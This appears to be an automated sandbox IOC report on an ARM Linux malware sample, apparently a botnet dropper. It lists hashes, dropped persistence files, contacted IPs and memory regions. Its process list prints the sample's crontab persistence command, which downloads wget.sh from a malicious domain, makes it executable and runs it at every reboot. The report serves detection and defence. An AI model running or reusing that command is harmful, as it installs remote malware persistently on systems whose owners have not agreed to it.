Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

arm7.elf

ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Entropy:	6.175069081047231
Filename:	arm7.elf
Filesize:	104916
MD5:	f89985f03f8a27ab418e05bc232e4387
SHA1:	b57e7df8cf4013be718f56be205e14919101e87a
SHA256:	15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
SHA512:	d4a66a8054dbd4cfbe2865c64bfde1e3dff384b1504a04b8ee21384737960de425e1069a2de14b6972420c99fbc40f0d11a7568d059678837b01c5868cd336b9
SSDEEP:	3072:lK8+viZckDqI5GaHSfCr8ZwTEEs2S8SjjIxX:lK8bZckDlGaHSfCr8iTEWSJjkxX
Preview:	.ELF..............(.........4...........4. ...(........p............ ... ................................................................b..........................................Q.td..................................-...L..................@-.,@...0....S

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Enumerates processes within the "proc" file system	Persistence and Installation Behavior	OS Credential Dumping
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.32.dr
ID:	dr_1
Target ID:	32
Process:	/tmp/arm7.elf
Type:	ASCII text
Entropy:	4.380927423351128
Encrypted:	false
Ssdeep:	3:aKVMFDEIGXjQJZWvYKQzQRFxFdljEIGXjQJZWv1SeDkiJCF9:DMFDKXsJovYL8jndFKXsJovFkTF9
Size:	124
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.hGK4g5

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.hGK4g5
Category:	dropped
Dump:	tmp.hGK4g5.38.dr
ID:	dr_2
Target ID:	38
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.165996814011452
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLYSHUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXA:8QjHig8USceHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/etc/init/bot.conf

ASCII text

dropped

Details

File:	/etc/init/bot.conf
Category:	dropped
Dump:	bot.conf.32.dr
ID:	dr_0
Target ID:	32
Process:	/tmp/arm7.elf
Type:	ASCII text
Entropy:	4.726559471748614
Encrypted:	false
Ssdeep:	6:SqEeZK8z7oXKqWFIw3CaXQw3cjICQDMFDKXsJovYL8jndFKXsJovFkTFdVOYHIaU:GeZfUX9HACcTSICQg+GABjnOGAFkROS2
Size:	346
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI

/usr/bin/dash

/usr/bin/cat

cat /tmp/tmp.slrTgTVxmA

/usr/bin/dash

/usr/bin/head

head -n 10

/usr/bin/dash

/usr/bin/tr

tr -d \\000-\\011\\013\\014\\016-\\037

/usr/bin/dash

/usr/bin/cut

cut -c -80

/usr/bin/dash

/usr/bin/cat

cat /tmp/tmp.slrTgTVxmA

/usr/bin/dash

/usr/bin/head

head -n 10

/usr/bin/dash

/usr/bin/tr

tr -d \\000-\\011\\013\\014\\016-\\037

/usr/bin/dash

/usr/bin/cut

cut -c -80

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI

/tmp/arm7.elf

/bin/sh

/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/arm7.elf

/bin/sh

/bin/sh -c "/sbin/initctl start bot"

/bin/sh

/tmp/arm7.elf

There are 26 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	32
From Memory:	true
Current Path:	/tmp/arm7.elf
Source:	bot.conf.32.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

kingstonwikkerink.dyn

185.82.200.181

IPs

Domain

Country

Malicious

213.182.204.57

unknown

Latvia

Details

IP:	213.182.204.57
TargetID:	-1
Country:	Latvia
Countrycode:	LVA
ASN number:	9009
ASN name:	M247GB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to many ports of the same IP (likely port scanning)	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

88.151.195.22

unknown

Azerbaijan

Details

IP:	88.151.195.22
TargetID:	-1
Country:	Azerbaijan
Countrycode:	AZE
ASN number:	15723
ASN name:	AZERONLINEAZ
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

558f01e22000

page read and write

7fd7a07b4000

page read and write

7fd79feaa000

page read and write

7fd698038000

page read and write

7fff4bab8000

page read and write

7fd7a07f9000

page read and write

7fd7a0667000

page read and write

558f01e2b000

page read and write

7fd698030000

page execute read

558f03e40000

page read and write

7fd798021000

page read and write

7fd7a07b4000

page read and write

7fff4badc000

page execute read

7fd698040000

page read and write

7fd7a0486000

page read and write

558f03e29000

page execute and read and write

7fd7a0790000

page read and write

558f01e2b000

page read and write

7fd7a0486000

page read and write

7fff4badc000

page execute read

7fd7a0115000

page read and write

7fd7a02a4000

page read and write

7fd698038000

page read and write

558f05928000

page read and write

7fd797fff000

page read and write

7fd79fb48000

page read and write

7fd7a0115000

page read and write

7fd7a0138000

page read and write

7fd79feaa000

page read and write

7fd7a07b4000

page read and write

7fd79fb48000

page read and write

7fd7a0790000

page read and write

7fd698040000

page read and write

558f01bd1000

page execute read

7fd7a07b4000

page read and write

7fff4bab8000

page read and write

7fd79fab6000

page read and write

558f03e29000

page execute and read and write

7fd7a0790000

page read and write

7fd7a02a4000

page read and write

558f01e2b000

page read and write

7fd798021000

page read and write

7fff4badc000

page execute read

7fd7a0115000

page read and write

7fd7a0486000

page read and write

558f05928000

page read and write

7fd798021000

page read and write

7fd79f2ae000

page read and write

558f03e40000

page read and write

7fd7a07f9000

page read and write

7fd79f2ae000

page read and write

7fd79fb48000

page read and write

7fff4bab8000

page read and write

7fd7a0138000

page read and write

7fd7a0667000

page read and write

7fd797fff000

page read and write

7fd698030000

page execute read

7fd798021000

page read and write

7fd7a02a4000

page read and write

7fd79f2ae000

page read and write

7fd698040000

page read and write

558f05928000

page read and write

7fd79fab6000

page read and write

7fd797fff000

page read and write

558f03e29000

page execute and read and write

558f01bd1000

page execute read

7fd698038000

page read and write

7fd7a0486000

page read and write

558f01bd1000

page execute read

7fd79feaa000

page read and write

558f03e40000

page read and write

7fd79fab6000

page read and write

7fd698030000

page execute read

7fd698041000

page read and write

7fd7a0790000

page read and write

7fd797fff000

page read and write

7fd7a07f9000

page read and write

7fd7a07f9000

page read and write

558f01e2b000

page read and write

558f01e22000

page read and write

7fd7a0138000

page read and write

558f05928000

page read and write

7fd7a02a4000

page read and write

7fd7a0667000

page read and write

7fd79fab6000

page read and write

558f01e22000

page read and write

7fd79feaa000

page read and write

7fff4bab8000

page read and write

558f03e40000

page read and write

7fd698030000

page execute read

558f03e29000

page execute and read and write

7fd7a0115000

page read and write

7fd7a0138000

page read and write

558f01bd1000

page execute read

558f01e22000

page read and write

7fd698038000

page read and write

7fd7a0667000

page read and write

7fff4badc000

page execute read

7fd698040000

page read and write

7fd79f2ae000

page read and write

7fd79fb48000

page read and write

There are 91 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm7.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm7.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
arm7.elf